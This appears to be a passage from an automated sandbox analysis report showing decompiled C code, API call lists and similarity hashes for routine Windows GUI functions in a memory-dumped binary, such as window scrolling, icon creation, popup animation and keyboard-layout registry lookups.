                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Menu$CreateInsertItemPopupVersion
                                                                                • String ID: ,$?
                                                                                • API String ID: 133695497-2308483597
                                                                                • Opcode ID: 3988cf044ec6df4286f32fd7ac8835f7c3f34a54fe678dbaec8ea00de5f63395
                                                                                • Instruction ID: 3d737bce33b9b63eca678c529a0aeb9621d3b228851bcedd8045e0118eaffb15
                                                                                • Opcode Fuzzy Hash: 3988cf044ec6df4286f32fd7ac8835f7c3f34a54fe678dbaec8ea00de5f63395
                                                                                • Instruction Fuzzy Hash: 7A611270A006449BEF10EFB9D88166E7BF6AF49304F45407AE944E7397E738D845C748
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 83%
                                                                                			E0045E014(void* __eax, int __ecx, signed int __edx, char _a4) {
                                                                                				signed int _v8;
                                                                                				signed int _v12;
                                                                                				struct tagRECT _v28;
                                                                                				char _v44;
                                                                                				int _t90;
                                                                                				void* _t112;
                                                                                				void* _t125;
                                                                                				void* _t131;
                                                                                				intOrPtr _t142;
                                                                                				int _t143;
                                                                                
                                                                                				_t143 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t125 = __eax;
                                                                                				_t2 =  &_a4; // 0x45e1e1
                                                                                				_t142 =  *_t2;
                                                                                				_v12 = 2;
                                                                                				if( *((char*)(__eax + 0x28c)) == 0) {
                                                                                					_v12 = _v12 | 0x00000004;
                                                                                				}
                                                                                				_t147 = _t143;
                                                                                				if(_t143 != 0) {
                                                                                					__eflags = _v8;
                                                                                					if(__eflags != 0) {
                                                                                						E00412984( *((intOrPtr*)(_t142 + 4)),  *((intOrPtr*)(_t142 + 0xc)), 0,  &_v28,  *((intOrPtr*)(_t142 + 0x34)));
                                                                                						ScrollWindowEx(E0043BD14(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
                                                                                						__eflags = 0;
                                                                                						E00412984(0,  *((intOrPtr*)(_t142 + 4)),  *((intOrPtr*)(_t142 + 0x34)),  &_v28,  *((intOrPtr*)(_t142 + 0x3c)));
                                                                                						ScrollWindowEx(E0043BD14(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
                                                                                						E00412984( *((intOrPtr*)(_t142 + 4)),  *((intOrPtr*)(_t142 + 0xc)),  *((intOrPtr*)(_t142 + 0x34)),  &_v28,  *((intOrPtr*)(_t142 + 0x3c)));
                                                                                						_t90 = ScrollWindowEx(E0043BD14(_t125), _v8, _t143,  &_v28,  &_v28, 0, 0, _v12);
                                                                                					} else {
                                                                                						E00412984(0,  *((intOrPtr*)(_t142 + 0xc)),  *((intOrPtr*)(_t142 + 0x34)),  &_v28,  *((intOrPtr*)(_t142 + 0x3c)));
                                                                                						_t90 = ScrollWindowEx(E0043BD14(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
                                                                                					}
                                                                                				} else {
                                                                                					if(E004037B0(_t125, _t147) != 0) {
                                                                                						_push( *((intOrPtr*)(_t142 + 0x3c)));
                                                                                						_push( &_v28);
                                                                                						_push(E004350A4(_t125) -  *((intOrPtr*)(_t142 + 4)));
                                                                                						_t112 = E004350A4(_t125);
                                                                                						__eflags = 0;
                                                                                						_pop(_t131);
                                                                                						E00412984(_t112 -  *((intOrPtr*)(_t142 + 0xc)), _t131, 0);
                                                                                						_v8 =  ~_v8;
                                                                                					} else {
                                                                                						E00412984( *((intOrPtr*)(_t142 + 4)),  *((intOrPtr*)(_t142 + 0xc)), 0,  &_v28,  *((intOrPtr*)(_t142 + 0x3c)));
                                                                                					}
                                                                                					_t90 = ScrollWindowEx(E0043BD14(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
                                                                                				}
                                                                                				_t149 =  *(_t125 + 0x249) & 0x00000010;
                                                                                				if(( *(_t125 + 0x249) & 0x00000010) == 0) {
                                                                                					return _t90;
                                                                                				} else {
                                                                                					E0045F820(_t125,  &_v44);
                                                                                					return E0045D710(_t125,  &_v44, _t149);
                                                                                				}
                                                                                			}














                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ScrollWindow
                                                                                • String ID: E
                                                                                • API String ID: 2126015319-2089609516
                                                                                • Opcode ID: a5590fd15d7490c7741a77b52d45b22a4dfcd2a404514be6f2ab8c321c5b2fcc
                                                                                • Instruction ID: 59567550c3053fb61c417f11c068a5971746d9c38f0f71f24a54f4a7561ce20a
                                                                                • Opcode Fuzzy Hash: a5590fd15d7490c7741a77b52d45b22a4dfcd2a404514be6f2ab8c321c5b2fcc
                                                                                • Instruction Fuzzy Hash: 3D510071A00509BBDB04DA99CD82FEFB7ACEF48304F405126BA05E7681CB78E955CBE4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E00420CEC() {
                                                                                				struct HINSTANCE__* _t145;
                                                                                				long _t166;
                                                                                				intOrPtr _t167;
                                                                                				intOrPtr _t186;
                                                                                				void* _t192;
                                                                                				BYTE* _t193;
                                                                                				BYTE* _t196;
                                                                                				intOrPtr _t197;
                                                                                				void* _t198;
                                                                                				intOrPtr _t199;
                                                                                
                                                                                				 *((intOrPtr*)(_t198 - 0x24)) = 0;
                                                                                				 *((intOrPtr*)(_t198 - 0x20)) = E00420B60( *( *((intOrPtr*)(_t198 - 0x10)) + 2) & 0x0000ffff);
                                                                                				_t192 =  *((intOrPtr*)(_t198 - 0xc)) - 1;
                                                                                				if(_t192 > 0) {
                                                                                					_t197 = 1;
                                                                                					do {
                                                                                						_t167 = E00420B60( *( *((intOrPtr*)(_t198 - 0x10)) + 2 + (_t197 + _t197) * 8) & 0x0000ffff);
                                                                                						if(_t167 <=  *((intOrPtr*)(_t198 - 0x1c)) && _t167 >=  *((intOrPtr*)(_t198 - 0x20)) && E00420B6C( *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8,  *((intOrPtr*)(_t198 - 0x10)) + (_t197 + _t197) * 8, _t198) != 0) {
                                                                                							 *((intOrPtr*)(_t198 - 0x24)) = _t197;
                                                                                							 *((intOrPtr*)(_t198 - 0x20)) = _t167;
                                                                                						}
                                                                                						_t197 = _t197 + 1;
                                                                                						_t192 = _t192 - 1;
                                                                                						_t204 = _t192;
                                                                                					} while (_t192 != 0);
                                                                                				}
                                                                                				 *(_t198 - 0x40) =  *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8;
                                                                                				 *( *(_t198 + 8)) =  *( *(_t198 - 0x40)) & 0x000000ff;
                                                                                				( *(_t198 + 8))[1] = ( *(_t198 - 0x40))[1] & 0x000000ff;
                                                                                				 *((intOrPtr*)(_t198 - 0x2c)) = E00408330(( *(_t198 - 0x40))[8], _t204);
                                                                                				 *[fs:eax] = _t199;
                                                                                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0x10))( *[fs:eax], 0x420ed3, _t198);
                                                                                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 8))();
                                                                                				E004209A4( *((intOrPtr*)(_t198 - 0x2c)),  *((intOrPtr*)(_t198 - 0x2c)), _t198 - 0x38, _t198 - 0x34, _t192,  *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))), _t204,  *(_t198 + 8));
                                                                                				GetObjectA( *(_t198 - 0x38), 0x18, _t198 - 0x70);
                                                                                				GetObjectA( *(_t198 - 0x34), 0x18, _t198 - 0x58);
                                                                                				_t166 =  *(_t198 - 0x64) *  *(_t198 - 0x68) * ( *(_t198 - 0x60) & 0x0000ffff);
                                                                                				 *(_t198 - 0x3c) =  *(_t198 - 0x4c) *  *(_t198 - 0x50) * ( *(_t198 - 0x48) & 0x0000ffff);
                                                                                				 *((intOrPtr*)(_t198 - 0x18)) =  *(_t198 - 0x3c) + _t166;
                                                                                				 *(_t198 - 0x30) = E00408330( *((intOrPtr*)(_t198 - 0x18)), _t204);
                                                                                				_push(_t198);
                                                                                				_push(0x420eb0);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t199;
                                                                                				_t193 =  *(_t198 - 0x30);
                                                                                				_t196 =  &(( *(_t198 - 0x30))[_t166]);
                                                                                				GetBitmapBits( *(_t198 - 0x38), _t166, _t193);
                                                                                				GetBitmapBits( *(_t198 - 0x34),  *(_t198 - 0x3c), _t196);
                                                                                				DeleteObject( *(_t198 - 0x34));
                                                                                				DeleteObject( *(_t198 - 0x38));
                                                                                				_t145 =  *0x487714; // 0x400000
                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) = CreateIcon(_t145,  *( *(_t198 + 8)), ( *(_t198 + 8))[1],  *(_t198 - 0x48),  *(_t198 - 0x46), _t193, _t196);
                                                                                				if( *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) == 0) {
                                                                                					E00420114(_t166);
                                                                                				}
                                                                                				_pop(_t186);
                                                                                				 *[fs:eax] = _t186;
                                                                                				_push(E00420EB7);
                                                                                				return E0040274C( *(_t198 - 0x30));
                                                                                			}














                                                                                APIs
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 00420DDE
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 00420DED
                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 00420E3E
                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 00420E4C
                                                                                • DeleteObject.GDI32(?), ref: 00420E55
                                                                                • DeleteObject.GDI32(?), ref: 00420E5E
                                                                                • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 00420E80
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                • String ID:
                                                                                • API String ID: 1030595962-0
                                                                                • Opcode ID: e9eab2e68ea044c9ea156f889c624f8d8221665ec8abac608e602645b7b127a8
                                                                                • Instruction ID: d2be98027a47b0f60a69fa7761058e0b512e7efa375e76c795a88d23bc60e875
                                                                                • Opcode Fuzzy Hash: e9eab2e68ea044c9ea156f889c624f8d8221665ec8abac608e602645b7b127a8
                                                                                • Instruction Fuzzy Hash: F1610671A00218AFCB00DFA9D881AAEBBF9FF49304B514466F804FB352D739AD51CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E0043D260(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr* _v8;
                                                                                				void _v12;
                                                                                				intOrPtr _v16;
                                                                                				int _v24;
                                                                                				int _v28;
                                                                                				intOrPtr _v32;
                                                                                				char _v36;
                                                                                				intOrPtr _t85;
                                                                                				void* _t113;
                                                                                				intOrPtr _t129;
                                                                                				intOrPtr _t138;
                                                                                				void* _t141;
                                                                                
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				_t113 = __ecx;
                                                                                				_v8 = __eax;
                                                                                				_t138 =  *0x486dac; // 0x487c00
                                                                                				 *((char*)(_v8 + 0x210)) = 1;
                                                                                				_push(_t141);
                                                                                				_push(0x43d427);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t141 + 0xffffffe0;
                                                                                				E004356D0(_v8, __ecx, __ecx, _t138);
                                                                                				_v16 = _v16 + 4;
                                                                                				E004368EC(_v8,  &_v28);
                                                                                				if(E004531E8() <  *(_v8 + 0x4c) + _v24) {
                                                                                					_v24 = E004531E8() -  *(_v8 + 0x4c);
                                                                                				}
                                                                                				if(E004531F4() <  *(_v8 + 0x48) + _v28) {
                                                                                					_v28 = E004531F4() -  *(_v8 + 0x48);
                                                                                				}
                                                                                				if(E004531DC() > _v28) {
                                                                                					_v28 = E004531DC();
                                                                                				}
                                                                                				if(E004531D0() > _v16) {
                                                                                					_v16 = E004531D0();
                                                                                				}
                                                                                				SetWindowPos(E0043BD14(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
                                                                                				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E004045D8(_t113) < 0x64 &&  *0x46b8cc != 0) {
                                                                                					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
                                                                                					if(_v12 != 0) {
                                                                                						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
                                                                                						if(_v12 == 0) {
                                                                                							E004404B4( &_v36);
                                                                                							if(_v32 <= _v24) {
                                                                                							}
                                                                                						}
                                                                                						 *0x46b8cc(E0043BD14(_v8), 0x64,  *0x0046B9D4 | 0x00040000);
                                                                                					}
                                                                                				}
                                                                                				ShowWindow(E0043BD14(_v8), 4);
                                                                                				 *((intOrPtr*)( *_v8 + 0x7c))();
                                                                                				_pop(_t129);
                                                                                				 *[fs:eax] = _t129;
                                                                                				_push(0x43d42e);
                                                                                				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
                                                                                				_t85 = _v8;
                                                                                				 *((char*)(_t85 + 0x210)) = 0;
                                                                                				return _t85;
                                                                                			}















                                                                                0x0043d409
                                                                                0x0043d416
                                                                                0x0043d41c
                                                                                0x0043d41f
                                                                                0x0043d426

                                                                                APIs
                                                                                • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,0043D427), ref: 0043D345
                                                                                • GetTickCount.KERNEL32 ref: 0043D34A
                                                                                • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0043D385
                                                                                • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043D39D
                                                                                • AnimateWindow.USER32(00000000,00000064,00000001), ref: 0043D3E3
                                                                                • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,0043D427), ref: 0043D3F4
                                                                                • GetTickCount.KERNEL32 ref: 0043D40E
                                                                                  • Part of subcall function 004404B4: GetCursorPos.USER32(?), ref: 004404B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                                • String ID:
                                                                                • API String ID: 3024527889-0
                                                                                • Opcode ID: ceb493bec2d905fdef923c3c531a51f5c382aecc693b1b4a997a9dade46dbdfe
                                                                                • Instruction ID: 893ef75b31aebc2a37a936a1955b57e4fbaaa27f92c468afc2ea37a70f40a7ca
                                                                                • Opcode Fuzzy Hash: ceb493bec2d905fdef923c3c531a51f5c382aecc693b1b4a997a9dade46dbdfe
                                                                                • Instruction Fuzzy Hash: BB517574A00109EFDB10DFA9C982A9EB7F4EF49304F204466F940E7391D779AE40CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 75%
                                                                                			E00453434(intOrPtr __eax, void* __ebx) {
                                                                                				intOrPtr _v8;
                                                                                				int _v12;
                                                                                				void* _v16;
                                                                                				char _v20;
                                                                                				void* _v24;
                                                                                				struct HKL__* _v280;
                                                                                				char _v536;
                                                                                				char _v600;
                                                                                				char _v604;
                                                                                				char _v608;
                                                                                				char _v612;
                                                                                				void* _t60;
                                                                                				intOrPtr _t106;
                                                                                				intOrPtr _t111;
                                                                                				void* _t117;
                                                                                				void* _t118;
                                                                                				intOrPtr _t119;
                                                                                
                                                                                				_t117 = _t118;
                                                                                				_t119 = _t118 + 0xfffffda0;
                                                                                				_v612 = 0;
                                                                                				_v8 = __eax;
                                                                                				_push(_t117);
                                                                                				_push(0x4535df);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t119;
                                                                                				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
                                                                                					L11:
                                                                                					_pop(_t106);
                                                                                					 *[fs:eax] = _t106;
                                                                                					_push(0x4535e6);
                                                                                					return E00404320( &_v612);
                                                                                				} else {
                                                                                					 *((intOrPtr*)(_v8 + 0x34)) = E00403584(1);
                                                                                					E00404320(_v8 + 0x38);
                                                                                					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
                                                                                					if(_t60 < 0) {
                                                                                						L10:
                                                                                						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
                                                                                						E00415F54( *((intOrPtr*)(_v8 + 0x34)), 1);
                                                                                						goto L11;
                                                                                					} else {
                                                                                						_v20 = _t60 + 1;
                                                                                						_v24 =  &_v280;
                                                                                						do {
                                                                                							if(E00440924( *_v24) == 0) {
                                                                                								goto L9;
                                                                                							} else {
                                                                                								_v608 =  *_v24;
                                                                                								_v604 = 0;
                                                                                								if(RegOpenKeyExA(0x80000002, E00409220( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", 0), 0, 0x20019,  &_v16) != 0) {
                                                                                									goto L9;
                                                                                								} else {
                                                                                									_push(_t117);
                                                                                									_push(0x45359b);
                                                                                									_push( *[fs:eax]);
                                                                                									 *[fs:eax] = _t119;
                                                                                									_v12 = 0x100;
                                                                                									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
                                                                                										E00404588( &_v612, 0x100,  &_v536);
                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
                                                                                										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
                                                                                											E00404588(_v8 + 0x38, 0x100,  &_v536);
                                                                                										}
                                                                                									}
                                                                                									_pop(_t111);
                                                                                									 *[fs:eax] = _t111;
                                                                                									_push(0x4535a2);
                                                                                									return RegCloseKey(_v16);
                                                                                								}
                                                                                							}
                                                                                							goto L12;
                                                                                							L9:
                                                                                							_v24 = _v24 + 4;
                                                                                							_t38 =  &_v20;
                                                                                							 *_t38 = _v20 - 1;
                                                                                						} while ( *_t38 != 0);
                                                                                						goto L10;
                                                                                					}
                                                                                				}
                                                                                				L12:
                                                                                			}

                                                                                APIs
                                                                                • GetKeyboardLayoutList.USER32(00000040,?,00000000,004535DF,?,02290F1C,?,00453641,00000000,?,00437C4F), ref: 0045348A
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 004534F2
                                                                                • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,0045359B,?,80000002,00000000), ref: 0045352C
                                                                                • RegCloseKey.ADVAPI32(?,004535A2,00000000,?,00000100,00000000,0045359B,?,80000002,00000000), ref: 00453595
                                                                                Strings
                                                                                • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 004534DC
                                                                                • layout text, xrefs: 00453523
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                                • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                                • API String ID: 1703357764-2652665750
                                                                                • Opcode ID: 6947dafba483a025d13b77e74c1a05237ebe01563b900a72a80e2a0971b0ec31
                                                                                • Instruction ID: 8d878b3f35002f07d186a4d1dffd632d93ff78f37112a753d71399f72f713053
                                                                                • Opcode Fuzzy Hash: 6947dafba483a025d13b77e74c1a05237ebe01563b900a72a80e2a0971b0ec31
                                                                                • Instruction Fuzzy Hash: 80414C74A0020DAFDB10DF55C981B9EB7F8EB48305F5144A6E904A7352E738AF44DB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 70%
                                                                                			E00422900(void* __eax, void* __edx) {
                                                                                				BYTE* _v8;
                                                                                				int _v12;
                                                                                				struct HDC__* _v16;
                                                                                				short _v18;
                                                                                				signed int _v24;
                                                                                				short _v26;
                                                                                				short _v28;
                                                                                				char _v38;
                                                                                				void* __ebx;
                                                                                				void* __ebp;
                                                                                				signed int _t35;
                                                                                				struct HDC__* _t43;
                                                                                				void* _t65;
                                                                                				intOrPtr _t67;
                                                                                				intOrPtr _t77;
                                                                                				void* _t80;
                                                                                				void* _t83;
                                                                                				void* _t85;
                                                                                				intOrPtr _t86;
                                                                                
                                                                                				_t83 = _t85;
                                                                                				_t86 = _t85 + 0xffffffdc;
                                                                                				_t80 = __edx;
                                                                                				_t65 = __eax;
                                                                                				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
                                                                                					return __eax;
                                                                                				} else {
                                                                                					E00402EC8( &_v38, 0x16);
                                                                                					_t67 =  *((intOrPtr*)(_t65 + 0x28));
                                                                                					_v38 = 0x9ac6cdd7;
                                                                                					_t35 =  *((intOrPtr*)(_t67 + 0x18));
                                                                                					if(_t35 != 0) {
                                                                                						_v24 = _t35;
                                                                                					} else {
                                                                                						_v24 = 0x60;
                                                                                					}
                                                                                					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
                                                                                					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
                                                                                					_t43 = E00420F04( &_v38);
                                                                                					_v18 = _t43;
                                                                                					_push(0);
                                                                                					L00406E20();
                                                                                					_v16 = _t43;
                                                                                					_push(_t83);
                                                                                					_push(0x422a3b);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t86;
                                                                                					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
                                                                                					_v8 = E0040272C(_v12);
                                                                                					_push(_t83);
                                                                                					_push(0x422a1b);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t86;
                                                                                					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
                                                                                						E00420114(_t67);
                                                                                					}
                                                                                					E00416268(_t80, 0x16,  &_v38);
                                                                                					E00416268(_t80, _v12, _v8);
                                                                                					_pop(_t77);
                                                                                					 *[fs:eax] = _t77;
                                                                                					_push(E00422A22);
                                                                                					return E0040274C(_v8);
                                                                                				}
                                                                                 			}

                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,?,000009EC), ref: 00422952
                                                                                • MulDiv.KERNEL32(?,?,000009EC), ref: 00422969
                                                                                • 72E7AC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 00422980
                                                                                • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,00422A3B,?,00000000,?,?,000009EC,?,?,000009EC), ref: 004229A4
                                                                                • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,00422A1B,?,?,00000000,00000000,00000008,?,00000000,00422A3B), ref: 004229D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: BitsFileMeta
                                                                                • String ID: `
                                                                                • API String ID: 858000408-2679148245
                                                                                • Opcode ID: 1767720ad7597bd8d7ece6e99a49d7682111587344853b9fc9378ef0583c8b42
                                                                                • Instruction ID: 2cb1a0d04e077efc4e63360fc705e0fb0881348a5fd4cdbe6f9f670913e1373a
                                                                                • Opcode Fuzzy Hash: 1767720ad7597bd8d7ece6e99a49d7682111587344853b9fc9378ef0583c8b42
                                                                                • Instruction Fuzzy Hash: 8931A874B00218ABDB00EFD5D982AAEB7B8EF08700F514456F904FB681D6789D40C769
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 73%
                                                                                			E0041B790() {
                                                                                				char _v5;
                                                                                				intOrPtr* _v12;
                                                                                				char _v16;
                                                                                				char _v20;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				long _t16;
                                                                                				char _t19;
                                                                                				intOrPtr _t21;
                                                                                				intOrPtr _t22;
                                                                                				intOrPtr _t24;
                                                                                				intOrPtr _t34;
                                                                                				void* _t39;
                                                                                				intOrPtr _t46;
                                                                                				intOrPtr* _t47;
                                                                                				intOrPtr _t48;
                                                                                				intOrPtr _t51;
                                                                                				void* _t53;
                                                                                				void* _t55;
                                                                                				void* _t58;
                                                                                				void* _t60;
                                                                                				intOrPtr _t61;
                                                                                
                                                                                				_t58 = _t60;
                                                                                				_t61 = _t60 + 0xfffffff0;
                                                                                				_push(_t39);
                                                                                				_push(_t55);
                                                                                				_push(_t53);
                                                                                				_t16 = GetCurrentThreadId();
                                                                                				_t47 =  *0x486dcc; // 0x487030
                                                                                				if(_t16 !=  *_t47) {
                                                                                					_v20 = GetCurrentThreadId();
                                                                                					_v16 = 0;
                                                                                					_t46 =  *0x486c5c; // 0x41036c
                                                                                					E0040A1A8(_t39, _t46, 1, _t53, _t55, 0,  &_v20);
                                                                                					E00403D80();
                                                                                				}
                                                                                				if( *0x487a00 == 0) {
                                                                                					_v5 = 0;
                                                                                					return _v5;
                                                                                				} else {
                                                                                					_push(0x487a04);
                                                                                					L00406840();
                                                                                					_push(_t58);
                                                                                					_push(0x41b8a6);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t61;
                                                                                					if( *0x46b4b8 == 0) {
                                                                                						L5:
                                                                                						_t19 = 0;
                                                                                					} else {
                                                                                						_t34 =  *0x46b4b8; // 0x0
                                                                                						if( *((intOrPtr*)(_t34 + 8)) > 0) {
                                                                                							_t19 = 1;
                                                                                						} else {
                                                                                							goto L5;
                                                                                						}
                                                                                					}
                                                                                					_v5 = _t19;
                                                                                					if(_v5 != 0) {
                                                                                						while(1) {
                                                                                							_t21 =  *0x46b4b8; // 0x0
                                                                                							if( *((intOrPtr*)(_t21 + 8)) <= 0) {
                                                                                								break;
                                                                                							}
                                                                                							_t22 =  *0x46b4b8; // 0x0
